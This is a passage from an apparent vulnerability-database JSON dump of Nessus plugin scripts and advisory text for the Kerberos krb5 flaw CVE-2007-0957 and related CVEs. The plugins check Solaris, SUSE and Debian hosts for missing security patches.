value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\");\n\n script_name(english:\"Solaris 8 (sparc) : 109223-10\");\n script_summary(english:\"Check for patch 109223-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109223-10\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: kpasswd, libgss.so.1 and libkad.\nDate this patch was last updated by Sun : Aug/03/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1017350.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcstlx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWgssx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWgss\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:01:27", "description": "SunOS 5.8_x86: kpasswd, libgss.so.1 and li.\nDate this patch was last updated by Sun : Aug/10/07", "edition": 21, "published": "2005-04-17T00:00:00", "title": "Solaris 8 (x86) : 109224-10", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "modified": "2005-04-17T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_109224.NASL", "href": "https://www.tenable.com/plugins/nessus/18070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18070);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\");\n\n script_name(english:\"Solaris 8 (x86) : 109224-10\");\n script_summary(english:\"Check for patch 109224-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109224-10\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: kpasswd, libgss.so.1 and li.\nDate this patch was last updated by Sun : Aug/10/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1017350.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWgss\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:05", "edition": 1, "description": "SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07", "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Solaris 5.8 (sparc) : 110061-22", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2798", "CVE-2007-0957"], "modified": "2013-03-30T00:00:00", "id": "SOLARIS8_110061.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36315", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(36315);\n script_version(\"$Revision: 1.7 $\");\n\n script_name(english: \"Solaris 5.8 (sparc) : 110061-22\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110061-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110061-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/04/23\");\n script_cvs_date(\"$Date: 2013/03/30 02:34:43 $\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110061-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2013 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.21.52\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.21.52\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:24:54", "description": "SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07", "edition": 1, "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 5.8 (x86) : 110061-22", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2798", "CVE-2007-0957"], "modified": "2013-03-30T00:00:00", "id": "SOLARIS8_X86_110061.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23444", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(23444);\n script_version(\"$Revision: 1.16 $\");\n\n script_name(english: \"Solaris 5.8 (x86) : 110061-22\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110061-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110061-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/06\");\n script_cvs_date(\"$Date: 2013/03/30 02:34:44 $\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110061-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2013 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.21.52\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.21.52\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:37:23", "edition": 2, "description": "SEAM 1.0.1: patch for Solaris 8.\nDate this patch was last updated by Sun : Jul/24/07", "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 5.8 (sparc) : 110060-22", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2798", "CVE-2007-0957"], "cpe": ["cpe:/o:sun:solaris"], "modified": "2013-03-30T00:00:00", "id": "SOLARIS8_110060.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23323", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(23323);\n script_version(\"$Revision: 1.17 $\");\n\n script_name(english: \"Solaris 5.8 (sparc) : 110060-22\");\n script_osvdb_id(34104, 36595);\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110060-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1: patch for Solaris 8.\nDate this patch was last updated by Sun : Jul/24/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110060-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute: \"patch_publication_date\", value: \"2007/07/24\");\n script_set_attribute(attribute: \"cpe\", value: \"cpe:/o:sun:solaris\");\n script_set_attribute(attribute: \"plugin_type\", value: \"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/06\");\n script_cvs_date(\"$Date: 2013/03/30 02:34:43 $\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/03\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110060-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2013 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.18.58\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-17T14:46:20", "description": "A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code (CVE-2007-0957).\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code\n(CVE-2007-1216).", "edition": 25, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : krb5 (krb5-3045)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-10-17T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:krb5-32bit", "p-cpe:/a:novell:opensuse:krb5-server", "p-cpe:/a:novell:opensuse:krb5-devel", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:krb5-devel-32bit", "p-cpe:/a:novell:opensuse:krb5"], "id": "SUSE_KRB5-3045.NASL", "href": "https://www.tenable.com/plugins/nessus/27308", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update krb5-3045.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27308);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-1216\");\n\n script_name(english:\"openSUSE 10 Security Update : krb5 (krb5-3045)\");\n script_summary(english:\"Check for the krb5-3045 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code (CVE-2007-0957).\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code\n(CVE-2007-1216).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-devel-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-server-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-devel-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-server-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"krb5-32bit-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.5.1-23.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5 / krb5-32bit / krb5-devel / krb5-devel-32bit / krb5-server\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:20", "description": "A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code. (CVE-2007-0957)\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code.\n(CVE-2007-1216)", "edition": 24, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : Kerberos 5 (ZYPP Patch Number 3046)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KRB5-3046.NASL", "href": "https://www.tenable.com/plugins/nessus/29492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29492);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-1216\");\n\n script_name(english:\"SuSE 10 Security Update : Kerberos 5 (ZYPP Patch Number 3046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code. (CVE-2007-0957)\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code.\n(CVE-2007-1216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-1216.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 3046.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"krb5-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"krb5-devel-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-devel-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-server-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:46", "description": "Several remote vulnerabilities have been discovered in the MIT\nreference implementation of the Kerberos network authentication\nprotocol suite, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-0956\n It was discovered that the krb5 telnet daemon performs\n insufficient validation of usernames, which might allow\n unauthorized logins or privilege escalation.\n\n - CVE-2007-0957\n iDefense discovered that a buffer overflow in the\n logging code of the KDC and the administration daemon\n might lead to arbitrary code execution.\n\n - CVE-2007-1216\n It was discovered that a double free in the RPCSEC_GSS\n part of the GSS library code might lead to arbitrary\n code execution.", "edition": 27, "published": "2007-04-10T00:00:00", "title": "Debian DSA-1276-1 : krb5 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2007-04-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:krb5"], "id": "DEBIAN_DSA-1276.NASL", "href": "https://www.tenable.com/plugins/nessus/25010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1276. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(25010);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_xref(name:\"DSA\", value:\"1276\");\n\n script_name(english:\"Debian DSA-1276-1 : krb5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the MIT\nreference 